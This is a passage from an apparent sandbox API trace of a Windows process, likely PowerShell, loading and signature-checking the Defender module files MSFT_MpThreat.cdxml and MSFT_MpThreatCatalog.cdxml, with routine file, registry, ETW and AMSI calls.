returned 0x0 [0274.010] EtwEventActivityIdControl () returned 0x0 [0274.011] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml")) returned 0x20 [0274.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0274.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0274.013] CoTaskMemAlloc (cb=0x20c) returned 0x1acf0310 [0274.013] GetSystemDirectoryW (in: lpBuffer=0x1acf0310, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0274.013] CoTaskMemFree (pv=0x1acf0310) [0274.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0274.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0274.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0274.014] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0274.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0274.014] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0274.015] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x3b8) returned 0x0 [0274.015] RegQueryValueExW (in: hKey=0x3b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0274.016] RegCloseKey (hKey=0x3b8) returned 0x0 [0274.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0274.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0274.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0274.016] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x28a4830 | out: lpFileInformation=0x28a4830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60)) returned 1 [0274.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0274.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0274.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0274.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0274.017] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60)) returned 1 [0274.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0274.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0274.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0274.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0274.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0274.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0274.017] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60)) returned 1 [0274.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0274.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0274.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0274.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0274.018] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0274.018] GetFileType (hFile=0x3b8) returned 0x1 [0274.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0274.018] GetFileType (hFile=0x3b8) returned 0x1 [0274.019] WTGetSignatureInfo () returned 0x0 [0274.079] CertDuplicateCertificateContext (pCertContext=0x1ad08c20) returned 0x1ad08c20 [0274.079] CryptCATHandleFromStore () returned 0x81ee00 [0274.079] WTHelperGetProvSignerFromChain () returned 0x818ef0 [0274.079] WTHelperGetProvCertFromChain () returned 0x1aa106a0 [0274.080] CertDuplicateCertificateContext (pCertContext=0x1ad08ba0) returned 0x1ad08ba0 [0274.081] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x5dc) returned 0x0 [0274.081] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0274.081] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x28a5080, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0274.081] RegCloseKey (hKey=0x5dc) returned 0x0 [0274.081] CoTaskMemAlloc (cb=0x10) returned 0x1ace8090 [0274.081] CoTaskMemAlloc (cb=0x50) returned 0x1acc7b70 [0274.082] WinVerifyTrust () returned 0x0 [0274.082] CoTaskMemFree (pv=0x1acc7b70) [0274.082] CoTaskMemFree (pv=0x1ace8090) [0274.082] CertFreeCertificateContext (pCertContext=0x1ad08c20) returned 1 [0274.082] CloseHandle (hObject=0x3b8) returned 1 [0274.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0274.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0274.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0274.083] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0274.083] GetFileType (hFile=0x3b8) returned 0x1 [0274.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83ccb8) returned 1 [0274.084] GetFileType (hFile=0x3b8) returned 0x1 [0274.084] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0274.084] ReadFile (in: hFile=0x3b8, lpBuffer=0x28a61b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x28a61b8*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0274.085] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0274.085] ReadFile (in: hFile=0x3b8, lpBuffer=0x28a61b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x28a61b8*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0274.086] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0274.086] ReadFile (in: hFile=0x3b8, lpBuffer=0x28a61b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x28a61b8*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0274.087] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0274.087] ReadFile (in: hFile=0x3b8, lpBuffer=0x28a61b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x28a61b8*, lpNumberOfBytesRead=0x1b83cd58*=0xb60, lpOverlapped=0x0) returned 1 [0274.087] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3b60 [0274.087] ReadFile (in: hFile=0x3b8, lpBuffer=0x28a5868, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x28a5868*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0274.087] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3b60 [0274.087] ReadFile (in: hFile=0x3b8, lpBuffer=0x28a61b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x28a61b8*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0274.089] CoTaskMemAlloc (cb=0x20c) returned 0x1acf22f0 [0274.089] GetSystemDirectoryW (in: lpBuffer=0x1acf22f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0274.089] CoTaskMemFree (pv=0x1acf22f0) [0274.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0274.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0274.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0274.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0274.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0274.091] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0274.091] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x5e0) returned 0x0 [0274.092] RegQueryValueExW (in: hKey=0x5e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0274.092] RegCloseKey (hKey=0x5e0) returned 0x0 [0274.092] CloseHandle (hObject=0x3b8) returned 1 [0274.340] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0x85c9d16, Data2=0x9c51, Data3=0x49d6, Data4=([0]=0xba, [1]=0xe, [2]=0xa2, [3]=0x23, [4]=0xc, [5]=0x95, [6]=0x39, [7]=0xc0))) returned 0x0 [0274.349] AmsiScanBuffer () returned 0x80070015 [0274.357] EtwEventWriteTransfer () returned 0x0 [0274.477] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0274.478] EtwEventActivityIdControl () returned 0x0 [0274.478] EtwEventActivityIdControl () returned 0x0 [0274.478] EtwEventActivityIdControl () returned 0x0 [0274.479] EtwEventActivityIdControl () returned 0x0 [0274.479] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0274.480] EtwEventActivityIdControl () returned 0x0 [0274.480] EtwEventActivityIdControl () returned 0x0 [0274.480] EtwEventActivityIdControl () returned 0x0 [0274.480] EtwEventActivityIdControl () returned 0x0 [0274.480] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x7738306d, Data2=0x7589, Data3=0x4d69, Data4=([0]=0xa6, [1]=0x6b, [2]=0x9b, [3]=0x64, [4]=0x52, [5]=0x51, [6]=0x72, [7]=0x36))) returned 0x0 [0274.480] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xbde088a7, Data2=0xde70, Data3=0x4980, Data4=([0]=0x9f, [1]=0xba, [2]=0x52, [3]=0x66, [4]=0xfc, [5]=0x70, [6]=0xe9, [7]=0x17))) returned 0x0 [0274.481] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0274.481] EtwEventActivityIdControl () returned 0x0 [0274.481] EtwEventActivityIdControl () returned 0x0 [0274.481] EtwEventActivityIdControl () returned 0x0 [0274.483] EtwEventActivityIdControl () returned 0x0 [0274.483] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x354b3ddf, Data2=0xf844, Data3=0x4127, Data4=([0]=0xab, [1]=0xdc, [2]=0xd4, [3]=0x19, [4]=0x80, [5]=0xaa, [6]=0x28, [7]=0xb4))) returned 0x0 [0274.484] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0274.485] EtwEventActivityIdControl () returned 0x0 [0274.485] EtwEventActivityIdControl () returned 0x0 [0274.485] EtwEventActivityIdControl () returned 0x0 [0274.486] EtwEventActivityIdControl () returned 0x0 [0274.487] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml")) returned 0x20 [0274.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0274.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0274.487] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1630 [0274.487] GetSystemDirectoryW (in: lpBuffer=0x1acf1630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0274.488] CoTaskMemFree (pv=0x1acf1630) [0274.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0274.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0274.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0274.488] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0274.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0274.488] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0274.488] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x3b8) returned 0x0 [0274.489] RegQueryValueExW (in: hKey=0x3b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0274.489] RegCloseKey (hKey=0x3b8) returned 0x0 [0274.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0274.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0274.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0274.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2959548 | out: lpFileInformation=0x2959548*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e)) returned 1 [0274.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0274.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0274.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0274.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0274.490] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, 